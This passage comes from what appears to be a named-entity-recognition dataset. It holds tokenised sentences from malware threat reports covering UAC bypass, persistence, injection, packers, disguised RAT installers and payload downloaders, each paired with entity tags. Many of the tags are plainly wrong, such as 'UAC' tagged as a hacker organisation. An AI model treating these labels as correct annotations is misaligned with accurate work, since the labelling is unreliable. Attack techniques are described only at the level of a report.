"adding", - "more", - "command-line", - "arguments" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "also", - "supports", - "command-line", - "arguments," - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "we", - "discovered", - "several", - "tools", - "used", - "for", - "UAC", - "bypass", - "in", - "Windows", - "10." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HackTool.Win32.ABPASS", - "is", - "a", - "tool", - "used", - "to", - "bypass", - "UAC", - "in", - "Windows", - "10." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HackTool.Win32.CCPASS", - "is", - "another", - "tool", - "that", - "is", - "also", - "used", - "for", - "Windows", - "10", - "UAC", - "bypass" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O" - ] - }, - { - "tokens": [ - "This", - "service", - "has", - "the", - "highest", - "privileges", - "that", - "can", - "be", - "abused", - "for", - "Windows", - "10", - "UAC", - "bypass." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SecTeam", - "O" - ] - }, - { - "tokens": [ - "UAC", - "bypass", - "will", - "be", - "executed", - "via", - "the", - "AppInfo", - "RPC", - "service." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O" - ] - }, - { - "tokens": [ - "UAC", - "Bypass", - "via", - "the", - "CMSTPLUA", - "COM", - "interface" - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "UAC", - "Bypass", - "via", - "the", - "AppInfo", - "RPC", - "service" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "UAC", - "bypass", - "will", - "be", - "executed" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "UAC", - "bypass", - "is", - "executed", - "via", - "token", - "manipulation." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "UAC", - "bypass", - "is", - "executed" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "net", - "user", - "<username>" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "and", - "the", - "following", - "data", - "is", - "written", - "into", - "registry:" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Registry", - "keys", - "changed" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "It", - "creates", - "a", - "new", - "Shell", - "in", - "the", - "registry." - ], - "ner_tags": [ - "O", - "I-Features", - "I-Features", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "it", - "installs", - "itself", - "to", - "%programdata%", - "and", - "then", - "sets", - "the", - "registry", - "run", - "key", - "for", - "persistence." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "It", - "invokes", - "the", - "undocumented", - "API", - "UserAssocSet", - "to", - "update", - "the", - "file", - "association." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "strings", - "and", - "the", - "APIs", - "used", - "by" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "It", - "installs", - "itself", - "by", - "creating", - "an", - "InstallSvc", - "service" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "creating", - "aservice", - "called", - "InstallSvc" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Creates", - "a", - "service" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "which", - "is", - "injected", - "to", - "conduct", - "backdoor", - "behaviors." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "and", - "inject", - "it", - "into", - "winver.exe", - "for", - "the", - "next-stage", - "payload" - ], - "ner_tags": [ - "O", - "B-Features", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "It", - "will", - "read", - "the", - "next", - "stage", - "payloads,", - "free.plg", - "and", - "main.plg,", - "and", - "inject", - "them", - "into", - "dllhost.exe." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "It", - "is", - "also", - "able", - "to", - "communicate", - "through", - "different", - "network", - "protocols", - "such", - "as", - "UDP", - "(User", - "Datagram", - "Protocol)", - "and", - "TCP", - "(Transmission", - "Control", - "Protocol)." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Delete", - "file" - ], - "ner_tags": [ - "B-SamFile", - "I-SamFile" - ] - }, - { - "tokens": [ - "Delete", - "file" - ], - "ner_tags": [ - "B-SamFile", - "I-SamFile" - ] - }, - { - "tokens": [ - "Keystrokes", - "and", - "windows", - "monitoring" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Monitor", - "keystrokes", - "and", - "windows" - ], - "ner_tags": [ - "I-Features", - "B-HackOrg", - "O", - "O" - ] - }, - { - "tokens": [ - "Keylogging" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "will", - "check", - "if", - "the", - "running", - "processes" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "will", - "check", - "if", - "the", - "process", - "avp.exe", - "exists." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "It", - "sets", - "up", - "a", - "run", - "key", - "for", - "via", - "the", - "command", - "C:\\ProgramData\\GoogleUpdate\\googleupdate.exe", - "work", - "for", - "persistence." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "It", - "sets", - "up", - "a", - "run", - "key", - "for", - "the", - "command", - "C:\\programdata\\netsky\\netsky.exe", - "online", - "for", - "persistence." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sets", - "Run", - "Key", - "with", - "“work/online”" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "It", - "installs", - "itself", - "by", - "creating", - "aservice", - "called", - "InstallSvc", - "which", - "will", - "trigger", - "“C:\\programdata\\netsky\\netsky.exe", - "online”." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "malware", - "first", - "generates", - "a", - "key", - "blob", - "randomly,", - "with", - "the", - "key", - "being", - "encrypted", - "in", - "a", - "custom", - "algorithm." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Regardless", - "of", - "whether", - "the", - "file", - "content", - "is", - "compressed", - "or", - "not,", - "it", - "will", - "be", - "encrypted", - "in", - "XOR", - "operations", - "with", - "a", - "specific", - "string" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "is", - "another", - "example", - "of", - "custom", - "malware", - "used", - "for", - "packing", - "files;" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Victims", - "will", - "receive", - "and", - "interact", - "with", - "a", - "decoy", - "document", - "containing", - "a", - "Google", - "Drive", - "link", - "and", - "a", - "corresponding", - "password", - "instead", - "of", - "an", - "archive", - "download", - "link", - "embedded", - "in", - "the", - "email." - ], - "ner_tags": [ - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Victims", - "will", - "receive", - "and", - "interact", - "with", - "a", - "decoy", - "document", - "containing", - "a", - "Google", - "Drive", - "link", - "and", - "a", - "corresponding", - "password", - "instead", - "of", - "an", - "archive", - "download", - "link", - "embedded", - "in", - "the", - "email." - ], - "ner_tags": [ - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "that", - "had", - "the", - "remote", - "desktop", - "service", - "enabled." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "and", - "the", - "creation", - "of", - "a", - "schedule", - "task." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "conceal", - "its", - "true", - "code", - "through", - "either", - "encryption", - "or", - "compression" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "make", - "the", - "malicious", - "payload", - "smaller", - "and", - "avoid", - "detection", - "based", - "on", - "static", - "malware", - "analysis", - "techniques" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "UPX", - "is", - "an", - "open-source", - "packing", - "algorithm" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MPRESS", - "is", - "a", - "free", - "packer." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Andromeda", - "is", - "a", - "custom", - "packer" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "compress", - "(and", - "if", - "it", - "has", - "the", - "functionality", - "of", - "a", - "crypter", - "also", - "encrypts)", - "the", - "original", - "executable,", - "which", - "is", - "saved", - "in", - "one", - "of", - "the", - "sections", - "of", - "the", - "final", - "packed", - "file." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "entry", - "point", - "of", - "the", - "original", - "file", - "is", - "relocated,", - "and", - "so", - "is", - "the", - "Import", - "Address", - "Table", - "(IAT)." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "change", - "the", - "final", - "payload’s", - "section", - "names," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "have", - "very", - "few", - "imports", - "as", - "they", - "don’t", - "rely", - "on", - "external", - "libraries" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "allocate", - "memory,", - "change", - "permissions,", - "read", - "the", - "encrypted/packed", - "chunk", - "of", - "code,", - "decrypt", - "it,", - "load", - "it", - "to", - "the", - "allocated", - "memory", - "space", - "and", - "execute", - "it" - ], - "ner_tags": [ - "O", - "B-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "use", - "system", - "calls" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "VirtualAlloc", - "used", - "for", - "allocating", - "memory", - "in", - "the", - "current", - "process" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "VirtualProtect", - "changes", - "the", - "permissions", - "of", - "the", - "given", - "virtual", - "address." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RtlDecompressBuffer", - "decompresses", - "the", - "provided", - "buffer." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CreateProcessInternalW", - "creates", - "a", - "new", - "process." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "can", - "create", - "a", - "new", - "threat", - "with", - "the", - "malicious", - "unpacked", - "payload." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "initial", - "code", - "usually", - "called", - "a", - "stub,", - "decrypts", - "or", - "decompresses", - "the", - "real", - "code" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "stub", - "is", - "a", - "small", - "part", - "of", - "code", - "that", - "implements", - "the", - "decompression", - "(and", - "decryption)", - "of", - "the", - "originally", - "packed", - "file" - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "payload", - "of", - "the", - "malware", - "can", - "be", - "part", - "of", - "the", - "loader’s", - "file" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "strongly", - "indicates", - "that", - "it", - "contains", - "another", - "component", - "that", - "is", - "dropped/loaded." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "it", - "can", - "be", - "downloaded", - "from", - "a", - "remote", - "location", - "(by", - "the", - "loader,", - "also", - "known", - "as", - "a", - "Downloader)." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "use", - "system", - "calls" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "VirtualAlloc", - "used", - "for", - "allocating", - "memory", - "in", - "the", - "current", - "process" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "VirtualProtect", - "changes", - "the", - "permissions", - "of", - "the", - "given", - "virtual", - "address" - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RtlDecompressBuffer", - "decompresses", - "the", - "provided", - "buffer." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "CreateProcessInternalW", - "creates", - "a", - "new", - "process" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "not", - "see", - "them", - "in", - "the", - "imported", - "function", - "list,", - "and", - "they", - "not", - "even", - "be", - "part", - "of", - "the", - "strings", - "in", - "the", - "sample." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "try", - "to", - "hide", - "these", - "system", - "calls" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "function", - "and", - "the", - "corresponding", - "library", - "are", - "dynamically", - "loaded", - "at", - "runtime", - "–", - "also", - "known", - "as", - "explicit", - "linking" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "this", - "executable", - "then", - "downloads", - "and", - "executes", - "additional", - "payloads" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "This", - "executable", - "binary", - "insecurely", - "downloads", - "and", - "executes", - "additional", - "payloads", - "from", - "the", - "Internet." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Downloading", - "and", - "running", - "further", - "executables" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "It", - "downloads", - "and", - "runs", - "an", - "executable", - "payload" - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "O", - "B-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "This", - "is", - "a", - "Windows", - "Native", - "Binary", - "executable", - "embedded", - "inside", - "of", - "UEFI", - "firmware", - "binary" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "This", - "Windows", - "executable", - "is", - "embedded", - "into", - "UEFI", - "firmware" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "embedded", - "Windows", - "executable" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "an", - "embedded", - "executable" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "This", - "executable", - "uses", - "the", - "Windows", - "Native", - "API" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool" - ] - }, - { - "tokens": [ - "It", - "then", - "sets", - "registry", - "entries" - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "to", - "run", - "this", - "executable", - "as", - "a", - "Windows", - "Service." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "when", - "using", - "the", - "HTTPS-enabled", - "options" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "implants", - "made", - "their", - "native", - "Windows", - "executables", - "look", - "like", - "legitimate", - "update", - "tools." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "Windows", - "payload", - "was", - "named", - "“IntelUpdater.exe”" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Capturing", - "screenshots" - ], - "ner_tags": [ - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "Real-time", - "screen", - "monitoring" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "a", - "legitimate", - "tool", - "which", - "is", - "frequently", - "used", - "by", - "bad", - "actors", - "for", - "malicious", - "purposes", - "in", - "ways", - "similar", - "to", - "TeamViewer" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-Purp", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "NetSupport", - "Manager,", - "used", - "maliciously", - "or", - "otherwise,", - "provides", - "full", - "and", - "complete", - "control", - "over", - "the", - "target", - "device." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "As", - "NetSupport", - "Manager", - "is", - "a", - "legitimate", - "tool", - "that", - "has", - "a", - "long", - "history", - "of", - "development,", - "it", - "is", - "highly", - "attractive", - "to", - "attackers", - "as", - "it", - "can", - "be", - "relied", - "on", - "to", - "work", - "‘out", - "of", - "the", - "box’." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "has", - "been", - "observed", - "in", - "multiple", - "ISO", - "files", - "masquerading", - "as", - "legitimate", - "software," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "RAT", - "installation", - "is", - "disguised", - "to", - "look", - "similar", - "to", - "a", - "Google", - "Chrome", - "installation." - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RAT", - "installer", - "disguised", - "as", - "Google", - "Chrome", - "setup" - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "threat", - "actors", - "are", - "able", - "to", - "masquerade", - "the", - "dropper", - "or", - "installer" - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "sample", - "is", - "obfuscated", - "via", - "the", - "Babadeda", - "crypter." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "a", - "base64", - "encoded", - "string", - "is", - "used", - "to", - "specify", - "various", - "parameters" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features" - ] - }, - { - "tokens": [ - "Base64", - "encoded", - "RAT", - "execution", - "command" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Persistence", - "for", - "the", - "RAT", - "is", - "achieved", - "via", - "registry", - "entry,", - "and", - "a", - "shortcut", - "to", - "the", - "installed", - "RAT", - "executable", - "is", - "written", - "to", - "the", - "Startup", - "folder." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "I-Features", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "B-SecTeam", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Persistence", - "via", - "Scheduled", - "Task" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "In", - "addition,", - "the", - "sample", - "generates", - "a", - "scheduled", - "task", - "with", - "multiple", - "triggers." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Network", - "adapter", - "details", - "are", - "pulled", - "via", - "GetAdaptersAddresses" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Additional", - "data", - "is", - "gleaned", - "via", - "WMI", - "queries" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "SELECT", - "*", - "FROM", - "Win32_ComputerSystem" - ], - "ner_tags": [ - "B-Way", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "all", - "running", - "processes", - "are", - "enumerated", - "and", - "logged", - "via", - "EnumProcesses", - "(32-bit", - "processes)." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "has", - "the", - "ability", - "to", - "drop", - "and", - "execute", - "additional", - "components." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "These", - "files", - "are", - "all", - "self-deleted", - "after", - "launch" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "threat", - "actors", - "using", - "this", - "tool", - "are", - "very", - "quick", - "to", - "update", - "their", - "lures", - "and", - "find", - "ways", - "to", - "entice", - "their", - "victims", - "into", - "installing", - "the", - "malicious", - "remote", - "control", - "software." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "decoded", - "command" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "Downloads", - "the", - "miner", - "and", - "watcher." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-HackOrg", - "O", - "O" - ] - }, - { - "tokens": [ - "then", - "a", - "malware", - "downloader", - "is", - "uploaded", - "to", - "the", - "device" - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Reconfigures", - "Windows", - "Defender", - "to", - "exclude", - "the", - "user", - "profile", - "path", - "and", - "the", - "entire", - "system", - "drive", - "from", - "scanning." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "its", - "“intelligent”", - "way", - "of", - "brute", - "forcing:", - "it", - "checks", - "the", - "prompt", - "and,", - "based", - "on", - "the", - "prompt,", - "it", - "selects", - "the", - "appropriate", - "credentials." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "This", - "method", - "speeds", - "up", - "the", - "brute", - "forcing", - "process" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "“intelligent", - "brute", - "forcing”" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "then", - "determines", - "the", - "processor", - "architecture" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Is", - "able", - "to", - "steal/gather", - "information", - "on", - "CPU", - "type,", - "screen", - "resolution" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-SamFile", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "downloading", - "of", - "the", - "actual", - "malware", - "is", - "done", - "via", - "a", - "variety", - "of", - "possible", - "commands", - "(for", - "example,", - "wget,", - "curl,", - "tftp", - "and", - "ftpget)." - ], - "ner_tags": [ - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Features", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "via", - "the", - "shell", - "“echo”", - "commands." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "keystroke" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "download", - "a", - "malicious", - "file" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "executes", - "a", - "malicious", - "script" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "JavaScript", - "is", - "the", - "module", - "that", - "has", - "to", - "be", - "manually", - "executed", - "by", - "the", - "victim," - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "zip", - "archive" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "comes", - "with", - "an", - "embedded", - "PE", - "payload" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "PE", - "is", - "stored", - "as", - "a", - "Base64", - "encoded", - "string" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "stored", 